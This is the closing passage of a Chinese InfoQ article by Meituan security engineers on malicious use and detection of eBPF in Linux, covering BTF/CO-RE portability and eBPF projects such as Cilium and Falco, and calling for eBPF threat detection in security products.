      因此,BTF&CO-RE 横空出现,BTF 可以理解为一种 Debug 符号描述方式,此前传统方式 Debug 信息会非常巨大,Linux 内核一般会关闭 Debug 符号,BTF 的出现解决了这一问题,大幅度减少 Debug 信息的大小,使得生产场景内核携带 Debug 信息成为可能。


      可喜的是,通过运用 BTF&CO-RE 这项技术,可以帮助开发者节省大量适配精力,但是这项技术目前还是在开发中,还有许多处理不了的场景,比如结构体成员被迁入子结构体中,这时候还是需要手动解决问题,BTF 的开发者也写了一篇文章,讲解不同场景的处理方案bpf-core-reference-guide

      大型项目


      在国外,云原生领域产品发展较快,涌现出一批批基于 eBPF 的产品,包括 Cilium、Datadog 、Falco、Katran 等,应用在网络编排、网络防火墙、跟踪定位、运行时安全等各个领域,可以借鉴这些大型项目的研发经验,来加快产品建设,包括多系统兼容、框架设计、项目质量、监控体系建设等。本篇以检测防御为主,工程建设相关经验,我们将在以后的文章中分享。

      总结  


      随着云原生快速发展,eBPF 实现软件、运行环境会越来越多。而 eBPF 的恶意利用也会越来越普遍。从国内外的情况来看,国外对这个方向的研究远比国内超前,我们再次呼吁大家,网络安全产品应当尽快具备 eBPF 相关威胁检测能力


      本文跟大家探讨了基于 eBPF 技术的恶意利用与检测机制,其中提到的 eBPF 在防御检测产品研发、工程建设等内容,我们将在下一篇跟大家分享,敬请期待。


      作者简介


      陈驰、杨一、鑫博,均来自美团信息安全部。


      参考文献:


      2023-03-16 06:0011595

      评论

      发布
      暂无评论
      发现更多内容

      膜拜!“Java葵花宝典”脉脉一周狂转50w次,Github访问量破百万

      Java架构师迁哥

      阿里内部不外传的50万字Java面试手册,首次开放,一天遭狂转10w次

      Java架构师迁哥

      学生管理系统详细架构设计

      毛先生

      学生管理系统架构设计方案

      Nico

      pymssql

      IT蜗壳-Tango

      9月日更

      学生管理系统详细架构设计文档

      消失的子弹

      大数据 云原生 CMS

      微服务到底是什么?spring cloud在国内中小型公司能用起来吗?

      Java架构师迁哥

      双非渣本后端,三个月逆袭字节,入职那天“泪目”了

      Java架构师迁哥

      JVM类加载器学习笔记

      风翱

      JVM 9月日更

      学生管理系统架构设计

      guangbao

      33岁公司倒闭,被迫走上大龄Java程序员求职之路

      Java架构师迁哥

      Github上标星80k的笔记就是diao,一个月帮我斩获8家大厂offer

      Java架构师迁哥

      Github上星标85k的,图解操作系统、网络、计算机 PDF,竟是阿里的?

      Java架构师迁哥

      知乎上线1小时,5w浏览量被下架的JVM全解笔记,内容太强大

      Java架构师迁哥

      算法有救了!GitHub上神仙项目手把手带你刷算法,Star数已破110k

      Java架构师迁哥

      架构实战营第三次作业

      Geek_d18264

      架构实战营

      覆盖80%以上Java性能调优场景,三年开发经验以下慎入

      Java架构师迁哥

      一妹子揭露美团面试中一些不愉快的事情(Java岗)

      Java架构师迁哥

      linux之rename命令

      入门小站

      Linux

      白手起家之分布式搜索ES

      卢卡多多

      9月日更

      超24W字,2021最新一线大厂Java高级架构师面试题总结,共计480页

      Java架构师迁哥

      网络攻防学习笔记 Day138

      穿过生命散发芬芳

      无线网络安全 9月日更

      双非渣本后端,三个月逆袭字节,入职那天“泪目”了

      Java架构师迁哥

      【MySQL技术专题】这也许是你的知识盲区->[主从架构]的多种同步模式

      洛神灬殇

      主从同步 高可用架构 MySQL 数据库 9月日更

      如何看待写作这件事

      QualityFocus

      个人成长 写作 写作感悟

      低代码平台J2PaaS即将发布开源版

      J2PaaS低代码平台

      低代码 开发工具 无代码

      阿里开源的面试全面解析,为什么会在Github一周标星63K?

      Java架构师迁哥

      阿里P8近十年的开发经验总结,卖168元,你觉得贵吗?

      Java架构师迁哥

      天猫“618”亿级高并发设计实战手册,限时分享

      Java架构师迁哥

      汽车行业的进化秘诀,竟在这座智慧出行乐园中……

      白洞计划

      在线JSON转flow工具

      入门小站

      工具

      浅谈:Linux中基于eBPF的恶意利用与检测机制_语言 & 开发_陈驰_InfoQ精选文章